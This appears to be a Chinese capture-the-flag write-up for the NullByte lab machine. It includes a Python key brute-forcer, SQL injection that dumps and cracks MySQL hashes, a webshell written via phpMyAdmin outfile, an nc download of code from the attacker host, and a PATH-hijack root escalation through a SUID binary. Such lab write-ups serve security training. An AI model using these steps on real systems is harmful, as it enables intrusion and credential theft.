跳转至

NullByte

知识整理
webfuzz
sql注入getshell
逆向
环境变量提权

usershell

靶机IP:192.168.205.133

端口信息:

80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
777/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

web服务目录扫描

[22:51:08] 200 -  196B  - /index.html                                       
[22:51:08] 301 -  323B  - /javascript  ->  http://192.168.205.133/javascript/
[22:51:11] 200 -   12KB - /phpmyadmin/docs/html/index.html                  
[22:51:11] 301 -  323B  - /phpmyadmin  ->  http://192.168.205.133/phpmyadmin/
[22:51:11] 200 -    9KB - /phpmyadmin/                                      
[22:51:11] 200 -    9KB - /phpmyadmin/index.php
[22:51:15] 301 -  320B  - /uploads  ->  http://192.168.205.133/uploads/     
[22:51:15] 200 -  113B  - /uploads/                             

尝试爆破phpmyadmin,未发现可利用点,经过一番尝试

image-20230925225327112

发现目录kzMb5nVYJw,需要Key登录,且html注释<!-- this form isn't connected to mysql, password ain't that complex --!>,尝试爆破

# -*- coding: utf-8 -*-

from requests import post
from queue import Queue
from bs4 import BeautifulSoup
from threading import Thread
import sys

q=Queue()
maxTread=50
Taskpool=[]
url="http://192.168.205.133/kzMb5nVYJw/index.php"

def verifyKey():
    while True:
        if q.empty():
            break
        else:
            key=q.get()
            payload={
                "key":key
            }
            response=post(url,data=payload)
            if len(response.text)!=244:
                print("Result:",key)
                sys.exit(1)


if __name__=="__main__":
    with open("/usr/share/wordlists/fuzzDicts/paramDict/parameter.txt",mode="r") as f:
        for key in f.readlines():
            q.put(key.strip())
    for i in range(maxTread):
        t=Thread(target=verifyKey)
        Taskpool.append(t)
    print("start brute")
    for t in Taskpool:
        t.start()

image-20230925225553904

得到Key,发现一个查询框,使用%"成功闭合

image-20230925225811459

root权限,再加上Apache服务器的默认路径,尝试getshell,发现没有写入权限,用户表也查询了一下,并没有发现有价值的信息

PS:复盘发现uploads可以直接写入,不需要爆破密码,当时没有想到

尝试查询mysql账号密码

EMP ID :localhost
EMP NAME : root
EMP POSITION : *18DC78FB0C441444482C7D1132C7A23D705DAFA7
--------------------------------
EMP ID :nullbyte
EMP NAME : root
EMP POSITION : *18DC78FB0C441444482C7D1132C7A23D705DAFA7
--------------------------------
EMP ID :127.0.0.1
EMP NAME : root
EMP POSITION : *18DC78FB0C441444482C7D1132C7A23D705DAFA7
--------------------------------
EMP ID :::1
EMP NAME : root
EMP POSITION : *18DC78FB0C441444482C7D1132C7A23D705DAFA7
--------------------------------
EMP ID :localhost
EMP NAME : debian-sys-maint
EMP POSITION : *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC
--------------------------------
EMP ID :localhost
EMP NAME : phpmyadmin
EMP POSITION : *18DC78FB0C441444482C7D1132C7A23D705DAFA7
--------------------------------
Fetched data successfully 

cmd5解密得到凭据root:sunnyvale,登录phpmyadmin 成功Getshell(使用outfile写入一句话/var/www/html/upload目录下)

获得立足点

经过枚举可以得到信息,(未用到的未列出)

# 真实用户
bob
eric
ramses
# 具有suid的文件
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
# 目标存在gcc g++ nc 但无curl

ramses用户在数据库中有密码,base64解码之后cmd5可查出明文值,但没用。

可疑文件/var/www/backup/procwatch

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char command[54]; // [esp+Eh] [ebp-3Ah] BYREF

  strcpy(command, "ps");
  system(command);
  return 0;
}

ida得出main函数,strcpy(command, "ps");未使用绝对路径,可以采用环境变量提权

ps.c

#include<stdio.h>
#include<stdlib.h>
int main(){
        system("bash -p");
        return 0;
}
# kali
nc -lvvp 7777<ps.c
# 目标
cd /tmp
nc 192.168.205.128 7777 > ps.c
gcc ps.c -o ps
export PATH=/tmp:$PATH
/var/www/backups/procwatch
cat /root/proof.txt